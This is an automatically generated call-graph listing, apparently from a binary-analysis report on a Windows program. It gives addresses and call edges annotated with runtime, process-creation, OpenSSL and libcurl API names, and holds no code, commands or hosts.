7ffbab04e5dc 80777->80783 80790 7ffbab049bfc 102 API calls 2 library calls 80778->80790 80781->80770 80782->80773 80791 7ffbab04e5c4 EnterCriticalSection 80783->80791 80785 7ffbab04e5f9 80786 7ffbab04e61c 104 API calls 80785->80786 80787 7ffbab04e602 80786->80787 80788 7ffbab04e5d0 __std_fs_directory_iterator_open LeaveCriticalSection 80787->80788 80789 7ffbab04e60d 80788->80789 80789->80776 80790->80776 80793 7ffbab04e0eb 80792->80793 80794 7ffbab04e119 80792->80794 80805 7ffbab049bfc 102 API calls 2 library calls 80793->80805 80801 7ffbab04e10b __std_fs_directory_iterator_open 80794->80801 80804 7ffbab04e5c4 EnterCriticalSection 80794->80804 80797 7ffbab04e130 80798 7ffbab04e14c 102 API calls 80797->80798 80799 7ffbab04e13c 80798->80799 80800 7ffbab04e5d0 __std_fs_directory_iterator_open LeaveCriticalSection 80799->80800 80800->80801 80801->80761 80802->80762 80803->80764 80805->80801 80807 7ffbab03b118 std::_Throw_Cpp_error 104 API calls 80806->80807 80808 7ffbaafc5e3c 80807->80808 80859 7ffbab0389d4 80808->80859 80811 7ffbaafc6150 137 API calls 80813 7ffbaafc5e76 80811->80813 80812 7ffbaafc5ec6 80814 7ffbaafc5ed3 80812->80814 80868 7ffbab038ca0 104 API calls 2 library calls 80812->80868 80813->80812 80816 7ffbaafc5eee 80813->80816 80823 7ffbaafe4c40 80814->80823 80817 7ffbaafc2570 104 API calls 80816->80817 80818 7ffbaafc5f2e 80817->80818 80819 7ffbab03d5f0 Concurrency::cancel_current_task 2 API calls 80818->80819 80820 7ffbaafc5f3f 80819->80820 80821 7ffbab049cd4 _invalid_parameter_noinfo_noreturn 102 API calls 80820->80821 80822 7ffbaafc5f81 80821->80822 80871 7ffbaafc5d00 80823->80871 80826 7ffbab03a1c8 80827 7ffbab03a20e 80826->80827 80833 7ffbaafe4b44 80827->80833 80876 7ffbab054604 80827->80876 80832 7ffbab04e1f4 102 API calls 80832->80833 80833->80738 80833->80740 80835 7ffbaafe48aa 80834->80835 80836 7ffbaafe48ca 80834->80836 81066 7ffbab04e57c 102 API calls 2 library calls 80835->81066 80838 7ffbab03b0f0 __std_fs_get_file_attributes_by_handle 8 API calls 80836->80838 80839 7ffbaafe4914 80838->80839 80840 7ffbaafe5050 80839->80840 80841 7ffbab03841c std::_Lockit::_Lockit 103 API calls 80840->80841 80842 7ffbaafe5080 80841->80842 80843 7ffbab03841c std::_Lockit::_Lockit 103 API calls 80842->80843 80848 7ffbaafe50cf 80842->80848 80844 7ffbaafe50a5 80843->80844 80846 7ffbab038494 std::_Lockit::~_Lockit LeaveCriticalSection 80844->80846 80845 7ffbab038494 std::_Lockit::~_Lockit LeaveCriticalSection 80847 7ffbaafe5160 80845->80847 80846->80848 80849 7ffbab03b0f0 __std_fs_get_file_attributes_by_handle 8 API calls 80847->80849 80858 7ffbaafe511c 80848->80858 81067 7ffbaafe5830 80848->81067 80850 7ffbaafe5170 80849->80850 80850->80747 80852 7ffbaafe512e 80853 7ffbaafe5134 80852->80853 80854 7ffbaafe5183 80852->80854 81083 7ffbab038990 RtlPcToFileHeader RaiseException Concurrency::cancel_current_task 80853->81083 81084 7ffbaafc1fc0 104 API calls 2 library calls 80854->81084 80857 7ffbaafe5188 80858->80845 80860 7ffbab03841c std::_Lockit::_Lockit 103 API calls 80859->80860 80861 7ffbab0389f6 80860->80861 80867 7ffbab038a19 memcpy_s 80861->80867 80869 7ffbab038bcc 104 API calls std::_Throw_Cpp_error 80861->80869 80863 7ffbab038a0e 80870 7ffbab038bfc 103 API calls std::locale::_Setgloballocale 80863->80870 80864 7ffbab038494 std::_Lockit::~_Lockit LeaveCriticalSection 80866 7ffbaafc5e4c 80864->80866 80866->80811 80867->80864 80868->80814 80869->80863 80870->80867 80872 7ffbab03b118 std::_Throw_Cpp_error 104 API calls 80871->80872 80873 7ffbaafc5d77 80872->80873 80874 7ffbab0389d4 107 API calls 80873->80874 80875 7ffbaafc5d87 80874->80875 80875->80740 80875->80826 80877 7ffbab054538 80876->80877 80878 7ffbab05455e 80877->80878 80881 7ffbab054591 80877->80881 80915 7ffbab049888 13 API calls _Strcoll 80878->80915 80880 7ffbab054563 80916 7ffbab049cb4 102 API calls _invalid_parameter_noinfo 80880->80916 80883 7ffbab054597 80881->80883 80884 7ffbab0545a4 80881->80884 80917 7ffbab049888 13 API calls _Strcoll 80883->80917 80903 7ffbab05c6d4 80884->80903 80888 7ffbab0545b8 80918 7ffbab049888 13 API calls _Strcoll 80888->80918 80889 7ffbab0545c5 80910 7ffbab060698 80889->80910 80892 7ffbab0545d8 __std_fs_directory_iterator_open 80919 7ffbab04e5d0 LeaveCriticalSection 80892->80919 80894 7ffbab03a241 80894->80833 80895 7ffbab04f49c 80894->80895 80896 7ffbab04f4cc 80895->80896 81051 7ffbab04f180 80896->81051 80900 7ffbab03a25c 80900->80832 80900->80833 80901 7ffbab04f50d 80901->80900 81063 7ffbab0498c8 102 API calls 2 library calls 80901->81063 80920 7ffbab053910 EnterCriticalSection 80903->80920 80905 7ffbab05c6eb 80906 7ffbab05c748 __std_fs_directory_iterator_open 15 API calls 80905->80906 80907 7ffbab05c6f6 80906->80907 80908 7ffbab053964 __std_fs_directory_iterator_open LeaveCriticalSection 80907->80908 80909 7ffbab0545ae 80908->80909 80909->80888 80909->80889 80921 7ffbab05ebf4 80910->80921 80913 7ffbab0606f0 80913->80892 80915->80880 80916->80894 80917->80894 80918->80894 80922 7ffbab05ec2f __crtLCMapStringW 80921->80922 80931 7ffbab05edf6 80922->80931 80936 7ffbab067098 102 API calls 4 library calls 80922->80936 80924 7ffbab05eecd 80940 7ffbab049cb4 102 API calls _invalid_parameter_noinfo 80924->80940 80926 7ffbab05edff 80926->80913 80933 7ffbab068410 80926->80933 80928 7ffbab05ee61 80928->80931 80937 7ffbab067098 102 API calls 4 library calls 80928->80937 80930 7ffbab05ee80 80930->80931 80938 7ffbab067098 102 API calls 4 library calls 80930->80938 80931->80926 80939 7ffbab049888 13 API calls _Strcoll 80931->80939 80941 7ffbab0679e0 80933->80941 80936->80928 80937->80930 80938->80931 80939->80924 80940->80926 80942 7ffbab0679f7 80941->80942 80943 7ffbab067a15 80941->80943 80996 7ffbab049888 13 API calls _Strcoll 80942->80996 80943->80942 80946 7ffbab067a31 80943->80946 80945 7ffbab0679fc 80997 7ffbab049cb4 102 API calls _invalid_parameter_noinfo 80945->80997 80952 7ffbab067ffc 80946->80952 80950 7ffbab067a08 80950->80913 80999 7ffbab067d24 80952->80999 80955 7ffbab06806f 81030 7ffbab049864 13 API calls _Strcoll 80955->81030 80956 7ffbab068087 81018 7ffbab066934 80956->81018 80960 7ffbab068074 81031 7ffbab049888 13 API calls _Strcoll 80960->81031 80988 7ffbab067a5c 80988->80950 80998 7ffbab06690c LeaveCriticalSection 80988->80998 80996->80945 80997->80950 81000 7ffbab067d5e 80999->81000 81009 7ffbab067d78 80999->81009 81000->81009 81043 7ffbab049888 13 API calls _Strcoll 81000->81043 81002 7ffbab067d6d 81044 7ffbab049cb4 102 API calls _invalid_parameter_noinfo 81002->81044 81004 7ffbab067e41 81006 7ffbab067ea3 81004->81006 81049 7ffbab066f38 102 API calls 2 library calls 81004->81049 81005 7ffbab067df0 81005->81004 81047 7ffbab049888 13 API calls _Strcoll 81005->81047 81006->80955 81006->80956 81009->81005 81045 7ffbab049888 13 API calls _Strcoll 81009->81045 81010 7ffbab067e36 81048 7ffbab049cb4 102 API calls _invalid_parameter_noinfo 81010->81048 81013 7ffbab067de5 81046 7ffbab049cb4 102 API calls _invalid_parameter_noinfo 81013->81046 81014 7ffbab067e9f 81014->81006 81015 7ffbab049d04 _invalid_parameter_noinfo_noreturn 17 API calls 81014->81015 81017 7ffbab067f36 81015->81017 81050 7ffbab053910 EnterCriticalSection 81018->81050 81030->80960 81031->80988 81043->81002 81044->81009 81045->81013 81046->81005 81047->81010 81048->81004 81049->81014 81052 7ffbab04f1ea 81051->81052 81053 7ffbab04f1aa 81051->81053 81052->81053 81055 7ffbab04f1f6 81052->81055 81065 7ffbab049bfc 102 API calls 2 library calls 81053->81065 81064 7ffbab04e5c4 EnterCriticalSection 81055->81064 81057 7ffbab04f1fb 81058 7ffbab04f318 102 API calls 81057->81058 81059 7ffbab04f20d 81058->81059 81060 7ffbab04e5d0 __std_fs_directory_iterator_open LeaveCriticalSection 81059->81060 81061 7ffbab04f1d1 81060->81061 81061->80901 81062 7ffbab0498c8 102 API calls 2 library calls 81061->81062 81062->80901 81063->80900 81065->81061 81066->80836 81068 7ffbaafe5978 81067->81068 81069 7ffbaafe585c 81067->81069 81068->80852 81069->81068 81070 7ffbab03b118 std::_Throw_Cpp_error 104 API calls 81069->81070 81071 7ffbaafe586f 81070->81071 81072 7ffbab03841c std::_Lockit::_Lockit 103 API calls 81071->81072 81073 7ffbaafe58a0 81072->81073 81074 7ffbaafe5996 81073->81074 81075 7ffbaafe58dc 81073->81075 81090 7ffbab038878 104 API calls Concurrency::cancel_current_task 81074->81090 81085 7ffbab038b44 81075->81085 81078 7ffbaafe59a2 81078->80852 81083->80858 81084->80857 81091 7ffbab053c8c 81085->81091 81087 7ffbab038b5d std::_Locinfo::_Locinfo_ctor 81088 7ffbab038b86 81087->81088 81089 7ffbab053c8c std::_Locinfo::_Locinfo_ctor 127 API calls 81087->81089 81089->81088 81090->81078 81096 7ffbab056fb8 81091->81096 81097 7ffbab056fc8 81096->81097 81100 7ffbab056fe4 std::_Locinfo::_Locinfo_ctor 81096->81100 81125 7ffbab056710 81097->81125 81099 7ffbab057012 81102 7ffbab05703b 81099->81102 81103 7ffbab056710 __crtLCMapStringW 102 API calls 81099->81103 81100->81099 81101 7ffbab056710 __crtLCMapStringW 102 API calls 81100->81101 81101->81099 81104 7ffbab057064 81102->81104 81106 7ffbab056710 __crtLCMapStringW 102 API calls 81102->81106 81103->81102 81105 7ffbab05708d 81104->81105 81107 7ffbab056710 __crtLCMapStringW 102 API calls 81104->81107 81108 7ffbab0570b6 81105->81108 81109 7ffbab056710 __crtLCMapStringW 102 API calls 81105->81109 81106->81104 81107->81105 81110 7ffbab0570df 81108->81110 81111 7ffbab056710 __crtLCMapStringW 102 API calls 81108->81111 81109->81108 81112 7ffbab057108 81110->81112 81113 7ffbab056710 __crtLCMapStringW 102 API calls 81110->81113 81111->81110 81114 7ffbab056710 __crtLCMapStringW 102 API calls 81112->81114 81115 7ffbab057131 81112->81115 81113->81112 81114->81115 81116 7ffbab053ca2 81115->81116 81117 7ffbab056710 __crtLCMapStringW 102 API calls 81115->81117 81118 7ffbab0539ac 81116->81118 81117->81116 81146 7ffbab053910 EnterCriticalSection 81118->81146 81120 7ffbab0539c8 81121 7ffbab0539ec std::_Locinfo::_Locinfo_ctor 127 API calls 81120->81121 81122 7ffbab0539d1 81121->81122 81123 7ffbab053964 __std_fs_directory_iterator_open LeaveCriticalSection 81122->81123 81124 7ffbab0539db 81123->81124 81124->81087 81126 7ffbab056800 81125->81126 81135 7ffbab056745 __crtLCMapStringW 81125->81135 81145 7ffbab053910 EnterCriticalSection 81126->81145 81128 7ffbab05676a LoadLibraryExW 81131 7ffbab05688f 81128->81131 81132 7ffbab05678f GetLastError 81128->81132 81130 7ffbab0568a8 GetProcAddress 81130->81126 81131->81130 81136 7ffbab05689f FreeLibrary 81131->81136 81132->81135 81135->81126 81135->81128 81135->81130 81144 7ffbab0567c9 LoadLibraryExW 81135->81144 81136->81130 81144->81131 81144->81135 81147 7ffbab00e3e0 81148 7ffbaafc5de0 138 API calls 81147->81148 81149 7ffbab00e4a9 81148->81149 81150 7ffbaafe4c40 107 API calls 81149->81150 81151 7ffbab00e4d6 81150->81151 81152 7ffbab03a1c8 102 API calls 81151->81152 81155 7ffbab00e577 81151->81155 81153 7ffbab00e4f8 81152->81153 81154 7ffbab00e4fd 81153->81154 81153->81155 81156 7ffbaafe4830 102 API calls 81154->81156 81158 7ffbaafc2570 104 API calls 81155->81158 81163 7ffbab00e52d 81155->81163 81157 7ffbab00e50f 81156->81157 81160 7ffbaafe5050 131 API calls 81157->81160 81159 7ffbab00e5e1 81158->81159 81161 7ffbab03d5f0 Concurrency::cancel_current_task 2 API calls 81159->81161 81160->81163 81162 7ffbab00e5f2 81161->81162 81164 7ffbab00d520 81165 7ffbab00d57c 81164->81165 81168 7ffbab00d65f 81164->81168 81166 7ffbaafc8440 137 API calls 81165->81166 81167 7ffbab00d5a3 81166->81167 81173 7ffbab00d5d3 81167->81173 81179 7ffbaafe36b0 81167->81179 81169 7ffbaafc2570 104 API calls 81168->81169 81171 7ffbab00d6a1 81169->81171 81170 7ffbab00d630 81172 7ffbab03d5f0 Concurrency::cancel_current_task 2 API calls 81171->81172 81172->81173 81173->81170 81174 7ffbaafc2570 104 API calls 81173->81174 81175 7ffbab00d6fa 81174->81175 81176 7ffbab03d5f0 Concurrency::cancel_current_task 2 API calls 81175->81176 81177 7ffbab00d70e 81176->81177 81180 7ffbaafe36e3 81179->81180 81181 7ffbaafe4740 104 API calls 81180->81181 81188 7ffbaafe373b 81180->81188 81183 7ffbaafe3706 81181->81183 81182 7ffbab03b0f0 __std_fs_get_file_attributes_by_handle 8 API calls 81184 7ffbaafe37a9 81182->81184 81185 7ffbaafe3726 81183->81185 81183->81188 81189 7ffbab04f404 81183->81189 81184->81173 81185->81188 81197 7ffbab04e9f0 81185->81197 81188->81182 81190 7ffbab04f434 81189->81190 81191 7ffbab04f180 102 API calls 81190->81191 81192 7ffbab04f44d 81191->81192 81193 7ffbab04f472 81192->81193 81206 7ffbab0498c8 102 API calls 2 library calls 81192->81206 81195 7ffbab04f487 81193->81195 81207 7ffbab0498c8 102 API calls 2 library calls 81193->81207 81195->81185 81198 7ffbab04ea19 81197->81198 81199 7ffbab04ea04 81197->81199 81198->81199 81201 7ffbab04ea1e 81198->81201 81216 7ffbab049888 13 API calls _Strcoll 81199->81216 81208 7ffbab05cf90 81201->81208 81202 7ffbab04ea09 81217 7ffbab049cb4 102 API calls _invalid_parameter_noinfo 81202->81217 81205 7ffbab04ea14 81205->81188 81206->81193 81207->81195 81209 7ffbab05cfc0 81208->81209 81218 7ffbab05ca98 81209->81218 81212 7ffbab05cfff 81214 7ffbab05d014 81212->81214 81229 7ffbab0498c8 102 API calls 2 library calls 81212->81229 81214->81205 81216->81202 81217->81205 81219 7ffbab05cae2 81218->81219 81220 7ffbab05cab3 81218->81220 81230 7ffbab04e5c4 EnterCriticalSection 81219->81230 81231 7ffbab049bfc 102 API calls 2 library calls 81220->81231 81223 7ffbab05cae7 81224 7ffbab05cb04 103 API calls 81223->81224 81225 7ffbab05caf3 81224->81225 81226 7ffbab04e5d0 __std_fs_directory_iterator_open LeaveCriticalSection 81225->81226 81227 7ffbab05cad3 81226->81227 81227->81212 81228 7ffbab0498c8 102 API calls 2 library calls 81227->81228 81228->81212 81229->81214 81231->81227 81232 7ffbab00d440 81233 7ffbab00d470 81232->81233 81234 7ffbaafc8440 137 API calls 81233->81234 81235 7ffbab00d481 81234->81235 81236 7ffbab00d4b2 81235->81236 81237 7ffbaafe36b0 105 API calls 81235->81237 81237->81236 81238 7ffbab011680 81239 7ffbab011715 81238->81239 81240 7ffbaafc93e0 104 API calls 81239->81240 81241 7ffbab011777 CreateProcessW 81240->81241 81242 7ffbab0117c2 81241->81242 81248 7ffbab0117bb 81241->81248 81243 7ffbab0117f7 CloseHandle CloseHandle 81242->81243 81244 7ffbab0117ca WaitForSingleObject CloseHandle CloseHandle 81242->81244 81246 7ffbaafe5fe0 2 API calls 81243->81246 81265 7ffbaafe5fe0 81244->81265 81249 7ffbab0117f0 81246->81249 81247 7ffbab011891 ctype 81250 7ffbab03b0f0 __std_fs_get_file_attributes_by_handle 8 API calls 81247->81250 81248->81247 81251 7ffbab0118bd 81248->81251 81253 7ffbab01181b 81249->81253 81252 7ffbab0118a5 81250->81252 81254 7ffbab049cd4 _invalid_parameter_noinfo_noreturn 102 API calls 81251->81254 81257 7ffbaafedcf0 81253->81257 81255 7ffbab0118c2 81254->81255 81259 7ffbaafedd20 81257->81259 81258 7ffbaafe5fe0 2 API calls 81258->81259 81259->81258 81260 7ffbaafedda6 81259->81260 81261 7ffbaafedd4b Sleep 81259->81261 81262 7ffbaafedd6a Sleep 81259->81262 81263 7ffbaafedd78 Sleep SleepEx 81259->81263 81260->81248 81261->81259 81262->81259 81263->81260 81270 7ffbab03a39c QueryPerformanceFrequency 81265->81270 81267 7ffbaafe5ff2 81271 7ffbab03a380 QueryPerformanceCounter 81267->81271 81269 7ffbaafe5ffa 81269->81249 81270->81267 81271->81269 81272 7ffbab42daa0 81273 7ffbab49edf0 81272->81273 81274 7ffbab42daae CRYPTO_zalloc 81273->81274 81275 7ffbab42dade CRYPTO_THREAD_lock_new 81274->81275 81276 7ffbab42dad6 81274->81276 81277 7ffbab42db2d CRYPTO_free 81275->81277 81278 7ffbab42db03 CRYPTO_new_ex_data 81275->81278 81280 7ffbab42db45 ERR_new ERR_set_debug ERR_set_error 81277->81280 81279 7ffbab42db20 CRYPTO_THREAD_lock_free 81278->81279 81283 7ffbab42dbe1 81278->81283 81279->81277 81281 7ffbab42db78 81280->81281 81282 7ffbab42dbc8 81280->81282 81281->81282 81284 7ffbab42db84 CRYPTO_free_ex_data 81281->81284 81285 7ffbab42dc3f OPENSSL_sk_dup 81283->81285 81286 7ffbab42db9b 81284->81286 81287 7ffbab42dca0 ERR_new ERR_set_debug ERR_set_error 81285->81287 81288 7ffbab42dcd3 81285->81288 81289 7ffbab42dbaa CRYPTO_THREAD_lock_free CRYPTO_free 81286->81289 81287->81281 81309 7ffbab41cb70 41 API calls 81288->81309 81289->81282 81291 7ffbab42dcdf 81291->81280 81291->81281 81292 7ffbab42dd73 X509_VERIFY_PARAM_new 81291->81292 81293 7ffbab42ddbc ERR_new ERR_set_debug ERR_set_error 81292->81293 81294 7ffbab42ddef X509_VERIFY_PARAM_inherit 81292->81294 81293->81281 81295 7ffbab42de03 81294->81295 81296 7ffbab42df09 81295->81296 81297 7ffbab42ded8 CRYPTO_memdup 81295->81297 81298 7ffbab42df57 81296->81298 81299 7ffbab42df23 CRYPTO_memdup 81296->81299 81297->81281 81297->81296 81300 7ffbab42df75 CRYPTO_malloc 81298->81300 81302 7ffbab42dfca 81298->81302 81299->81281 81299->81298 81300->81281 81301 7ffbab42dfa6 memcpy 81300->81301 81301->81302 81302->81280 81303 7ffbab42e0c2 CRYPTO_memdup 81302->81303 81304 7ffbab42e0eb 81302->81304 81303->81280 81303->81304 81305 7ffbab42e105 CRYPTO_memdup 81304->81305 81306 7ffbab42e12e 81304->81306 81305->81280 81305->81306 81306->81280 81306->81282 81307 7ffbab42e182 ERR_new ERR_set_debug ERR_set_error 81306->81307 81308 7ffbab42e1b5 81306->81308 81307->81280 81308->81280 81308->81282 81309->81291 81310 7ffbaafe65f0 curl_easy_init 81311 7ffbaafe664a 81310->81311 81313 7ffbaafe6675 81310->81313 81312 7ffbaafc3ff0 std::_Throw_Cpp_error 104 API calls 81311->81312 81330 7ffbaafe666d ctype 81312->81330 81315 7ffbab03b118 std::_Throw_Cpp_error 104 API calls 81313->81315 81314 7ffbab03b0f0 __std_fs_get_file_attributes_by_handle 8 API calls 81316 7ffbaafe685e 81314->81316 81317 7ffbaafe66d7 81315->81317 81396 7ffbaafe8e40 81317->81396 81319 7ffbaafe6716 81321 7ffbaafe673e 81319->81321 81419 7ffbaafee1c0 81319->81419 81428 7ffbaafe72f0 81321->81428 81326 7ffbaafe6db7 curl_easy_cleanup 81328 7ffbaafc56a0 std::_Throw_Cpp_error 104 API calls 81326->81328 81327 7ffbaafe5fe0 2 API calls 81329 7ffbaafe6776 81327->81329 81344 7ffbaafe680d 81328->81344 81331 7ffbaafedcf0 6 API calls 81329->81331 81330->81314 81334 7ffbaafe67cf curl_easy_cleanup curl_easy_init 81331->81334 81332 7ffbaafe6e1d 81333 7ffbab049cd4 _invalid_parameter_noinfo_noreturn 102 API calls 81332->81333 81335 7ffbaafe6e23 81333->81335 81336 7ffbaafe6881 81334->81336 81337 7ffbaafe67ed 81334->81337 81341 7ffbab049cd4 _invalid_parameter_noinfo_noreturn 102 API calls 81335->81341 81338 7ffbab03b118 std::_Throw_Cpp_error 104 API calls 81336->81338 81339 7ffbaafc3ff0 std::_Throw_Cpp_error 104 API calls 81337->81339 81340 7ffbaafe689e 81338->81340 81339->81344 81342 7ffbaafe8e40 104 API calls 81340->81342 81343 7ffbaafe6e29 81341->81343 81345 7ffbaafe68e6 81342->81345 81346 7ffbab049cd4 _invalid_parameter_noinfo_noreturn 102 API calls 81343->81346 81344->81330 81344->81332 81347 7ffbaafee1c0 104 API calls 81345->81347 81349 7ffbaafe690f 81345->81349 81348 7ffbaafe6e2f 81346->81348 81347->81345 81350 7ffbab049cd4 _invalid_parameter_noinfo_noreturn 102 API calls 81348->81350 81351 7ffbaafe72f0 156 API calls 81349->81351 81352 7ffbaafe6e35 81350->81352 81353 7ffbaafe6933 81351->81353 81355 7ffbab049cd4 _invalid_parameter_noinfo_noreturn 102 API calls 81352->81355 81523 7ffbaafce610 81353->81523 81357 7ffbaafe6e3b 81355->81357 81356 7ffbaafe6946 ctype 81356->81335 81359 7ffbaafe6e60 125 API calls 81356->81359 81358 7ffbab049cd4 _invalid_parameter_noinfo_noreturn 102 API calls 81357->81358 81360 7ffbaafe6e41 81358->81360 81361 7ffbaafe69a8 81359->81361 81362 7ffbab049cd4 _invalid_parameter_noinfo_noreturn 102 API calls 81360->81362 81361->81326 81364 7ffbaafe5fe0 2 API calls 81361->81364 81363 7ffbaafe6e47 81362->81363 81365 7ffbaafe69c5 81364->81365 81366 7ffbaafedcf0 6 API calls 81365->81366 81367 7ffbaafe6a15 81366->81367 81528 7ffbaafe8040 81367->81528 81370 7ffbaafe6da9 ctype 81370->81326 81372 7ffbaafe6a62 81380 7ffbaafe6cf0 ctype 81372->81380 81587 7ffbaafe7d50 81372->81587 81373 7ffbaafe6e12 81375 7ffbab049cd4 _invalid_parameter_noinfo_noreturn 102 API calls 81373->81375 81376 7ffbaafe6e17 81375->81376 81379 7ffbab049cd4 _invalid_parameter_noinfo_noreturn 102 API calls 81376->81379 81378 7ffbaafe6a95 curl_easy_cleanup curl_easy_init 81381 7ffbaafe6be4 81378->81381 81382 7ffbaafe6ab3 81378->81382 81379->81332 81380->81357 81380->81360 81380->81370 81380->81373 81383 7ffbab03b118 std::_Throw_Cpp_error 104 API calls 81381->81383 81384 7ffbaafc3ff0 std::_Throw_Cpp_error 104 API calls 81382->81384 81385 7ffbaafe6bfe 81383->81385 81389 7ffbaafe6ad3 ctype 81384->81389 81386 7ffbaafe8e40 104 API calls 81385->81386 81387 7ffbaafe6c41 81386->81387 81388 7ffbaafee1c0 104 API calls 81387->81388 81390 7ffbaafe6c6f 81387->81390 81388->81387 81389->81330 81389->81343 81389->81348 81389->81357 81389->81376 81391 7ffbaafe72f0 156 API calls 81390->81391 81392 7ffbaafe6c8c 81391->81392 81393 7ffbaafce610 102 API calls 81392->81393 81394 7ffbaafe6c9f ctype 81393->81394 81394->81352 81395 7ffbaafe6e60 125 API calls 81394->81395 81395->81380 81397 7ffbaafe8e6c 81396->81397 81407 7ffbaafe8f0b ctype 81396->81407 81398 7ffbaafe8f72 81397->81398 81399 7ffbaafe8e91 81397->81399 81401 7ffbaafe8ec7 81397->81401 81402 7ffbaafe8e9e 81397->81402 81619 7ffbaafc1950 104 API calls 2 library calls 81398->81619 81405 7ffbab049cd4 _invalid_parameter_noinfo_noreturn 102 API calls 81399->81405 81399->81407 81404 7ffbab03b118 std::_Throw_Cpp_error 104 API calls 81401->81404 81402->81398 81403 7ffbaafe8eab 81402->81403 81406 7ffbab03b118 std::_Throw_Cpp_error 104 API calls 81403->81406 81404->81399 81408 7ffbaafe8f7d 81405->81408 81406->81399 81407->81319 81411 7ffbaafe901a 81408->81411 81412 7ffbaafe945e 81408->81412 81417 7ffbaafe9330 ctype 81408->81417 81418 7ffbaafe9027 81408->81418 81409 7ffbab03b0f0 __std_fs_get_file_attributes_by_handle 8 API calls 81410 7ffbaafe943a 81409->81410 81410->81319 81620 7ffbaafe9f60 104 API calls 4 library calls 81411->81620 81622 7ffbaafd6a30 104 API calls 2 library calls 81412->81622 81416 7ffbaafe9463 81417->81409 81621 7ffbaafe9480 102 API calls 2 library calls 81418->81621 81423 7ffbaafee23b 81419->81423 81420 7ffbaafee255 81420->81319 81421 7ffbab03b118 std::_Throw_Cpp_error 104 API calls 81424 7ffbaafee29e 81421->81424 81423->81420 81423->81421 81426 7ffbaafee37f 81423->81426 81424->81426 81623 7ffbaaff1dc0 104 API calls std::_Throw_Cpp_error 81424->81623 81624 7ffbab03880c 104 API calls 2 library calls 81426->81624 81429 7ffbaafe7339 81428->81429 81430 7ffbaafe733c 6 API calls 81428->81430 81429->81430 81434 7ffbaafe73db curl_easy_setopt 81430->81434 81432 7ffbaafe7427 curl_easy_setopt curl_easy_perform 81435 7ffbaafe7468 curl_easy_strerror 81432->81435 81436 7ffbaafe74c3 curl_easy_getinfo curl_easy_getinfo 81432->81436 81434->81432 81437 7ffbaafe7490 81435->81437 81439 7ffbaafe7508 81436->81439 81448 7ffbaafe7547 _Strcoll ctype 81436->81448 81437->81437 81438 7ffbaafc3ff0 std::_Throw_Cpp_error 104 API calls 81437->81438 81473 7ffbaafe74a9 81438->81473 81442 7ffbaafc3ff0 std::_Throw_Cpp_error 104 API calls 81439->81442 81439->81448 81440 7ffbaafe795b 81444 7ffbaafd8370 104 API calls 81440->81444 81441 7ffbaafe76ab curl_easy_setopt 81443 7ffbaafe76cd memcpy_s 81441->81443 81442->81448 81450 7ffbaafe4a30 138 API calls 81443->81450 81444->81473 81445 7ffbab03b0f0 __std_fs_get_file_attributes_by_handle 8 API calls 81446 7ffbaafe6759 81445->81446 81475 7ffbaafe6e60 81446->81475 81447 7ffbaafe7a5f 81449 7ffbab049cd4 _invalid_parameter_noinfo_noreturn 102 API calls 81447->81449 81448->81440 81448->81441 81448->81447 81451 7ffbaafe7a65 81449->81451 81452 7ffbaafe76e8 81450->81452 81453 7ffbaafe7719 81452->81453 81454 7ffbaafe77ad curl_easy_setopt curl_easy_perform 81452->81454 81455 7ffbaafc3ff0 std::_Throw_Cpp_error 104 API calls 81453->81455 81456 7ffbaafe4930 104 API calls 81454->81456 81458 7ffbaafe773e 81455->81458 81457 7ffbaafe77d3 81456->81457 81459 7ffbaafe7809 81457->81459 81467 7ffbaafe7a10 81457->81467 81625 7ffbaafe40d0 104 API calls 81458->81625 81461 7ffbaafe78ca 81459->81461 81462 7ffbaafe7811 curl_easy_strerror 81459->81462 81464 7ffbaafc3ff0 std::_Throw_Cpp_error 104 API calls 81461->81464 81463 7ffbaafe7830 81462->81463 81463->81463 81466 7ffbaafc3ff0 std::_Throw_Cpp_error 104 API calls 81463->81466 81465 7ffbaafe78ec 81464->81465 81627 7ffbaafe40d0 104 API calls 81465->81627 81469 7ffbaafe7849 81466->81469 81471 7ffbaafc2570 104 API calls 81467->81471 81626 7ffbaafe40d0 104 API calls 81469->81626 81472 7ffbaafe7a4f 81471->81472 81474 7ffbab03d5f0 Concurrency::cancel_current_task 2 API calls 81472->81474 81473->81445 81474->81447 81476 7ffbaafe6e78 ctype 81475->81476 81477 7ffbab049cd4 _invalid_parameter_noinfo_noreturn 102 API calls 81476->81477 81478 7ffbaafe6f02 curl_easy_init 81477->81478 81480 7ffbaafe6f58 81478->81480 81482 7ffbaafe6f84 81478->81482 81481 7ffbaafc3ff0 std::_Throw_Cpp_error 104 API calls 81480->81481 81499 7ffbaafe6f7b ctype 81481->81499 81484 7ffbab03b118 std::_Throw_Cpp_error 104 API calls 81482->81484 81483 7ffbab03b0f0 __std_fs_get_file_attributes_by_handle 8 API calls 81485 7ffbaafe6763 81483->81485 81486 7ffbaafe6fe6 81484->81486 81485->81326 81485->81327 81487 7ffbaafe8e40 104 API calls 81486->81487 81488 7ffbaafe702c 81487->81488 81489 7ffbaafee1c0 104 API calls 81488->81489 81490 7ffbaafe7052 81488->81490 81489->81488 81628 7ffbaafe7a70 81490->81628 81492 7ffbaafe7066 81493 7ffbaafe6e60 121 API calls 81492->81493 81494 7ffbaafe7071 81493->81494 81495 7ffbaafe727a curl_easy_cleanup 81494->81495 81496 7ffbaafe5fe0 2 API calls 81494->81496 81497 7ffbaafc56a0 std::_Throw_Cpp_error 104 API calls 81495->81497 81498 7ffbaafe7085 81496->81498 81510 7ffbaafe711a 81497->81510 81501 7ffbaafedcf0 6 API calls 81498->81501 81499->81483 81500 7ffbaafe72da 81502 7ffbab049cd4 _invalid_parameter_noinfo_noreturn 102 API calls 81500->81502 81503 7ffbaafe70dc curl_easy_cleanup curl_easy_init 81501->81503 81506 7ffbaafe72e0 81502->81506 81504 7ffbaafe70fa 81503->81504 81505 7ffbaafe7184 81503->81505 81507 7ffbaafc3ff0 std::_Throw_Cpp_error 104 API calls 81504->81507 81508 7ffbab03b118 std::_Throw_Cpp_error 104 API calls 81505->81508 81507->81510 81509 7ffbaafe719f 81508->81509 81511 7ffbaafe8e40 104 API calls 81509->81511 81510->81499 81510->81500 81512 7ffbaafe71de 81511->81512 81513 7ffbaafee1c0 104 API calls 81512->81513 81514 7ffbaafe7203 81512->81514 81513->81512 81515 7ffbaafe7a70 115 API calls 81514->81515 81516 7ffbaafe7216 81515->81516 81517 7ffbaafce610 102 API calls 81516->81517 81518 7ffbaafe7229 81517->81518 81519 7ffbaafe725b ctype 81518->81519 81521 7ffbaafe72d5 81518->81521 81520 7ffbaafe6e60 121 API calls 81519->81520 81520->81495 81522 7ffbab049cd4 _invalid_parameter_noinfo_noreturn 102 API calls 